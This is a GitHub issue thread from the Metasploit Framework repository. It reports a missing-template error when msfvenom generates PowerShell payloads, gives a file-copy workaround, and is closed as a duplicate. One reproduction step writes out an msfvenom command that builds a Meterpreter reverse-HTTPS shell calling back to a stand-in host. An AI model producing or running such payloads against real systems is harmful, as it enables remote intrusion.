### ISSUE TITLE
Generating Powershell Payload

### ISSUE THREAD

**Issue by aconite33** [rapid7/metasploit-framework#7526] opened 2016-11-02 21:28 UTC
## Steps to reproduce

How'd you do it?

1. Use msfvenom with the following command:
msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=443 -f psh

## Expected behavior
Payload Generation

## Current behavior
Error: No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/templates/scripts/to_mem_old.ps1.template

You might also want to check the last ~1k lines of
`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
`~/.msf4/logs/framework.log` for relevant stack traces

### Metasploit version
msf > version
Framework: 4.12.39-dev
Console  : 4.12.39-dev

### I installed Metasploit with:
- [x ] Kali package via apt

### OS

What OS are you running Metasploit on?
Kali - debian rolling version

### Fix
I was able to fix this by copying the file from:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-powershell-0.1.66/data/templates/to_mem_old.ps1.template

To:
/usr/share/metasploit-framework/data/templates/scripts/

Reran the above command and it generated the correct payload.

**Comment by aconite33** [comment] 2016-11-02 22:29
Also seems to be having the same problem for psh-reflection

**Comment by void-in** [comment] 2016-11-03 07:12
This issue is a duplicate of https://github.com/rapid7/metasploit-framework/issues/7519 which was patched in https://github.com/rapid7/metasploit-framework/pull/7523. Can you git pull (if you have checkout the repo) and check the psh-reflection and psh format again? If you are using msf through Kali packages, you will have to wait till Friday where the updates are usually pushed.

**Comment by aconite33** [comment] 2016-11-03 13:09
Ahh okay, I am using it via Kali. I'll check this on Friday and verify.

**Comment by void-in** [comment] 2016-11-03 14:22
I will close this. If you encounter any errors, feel free to re-open. Thanks.

**Closed by void-in** 2016-11-03 14:22 UTC
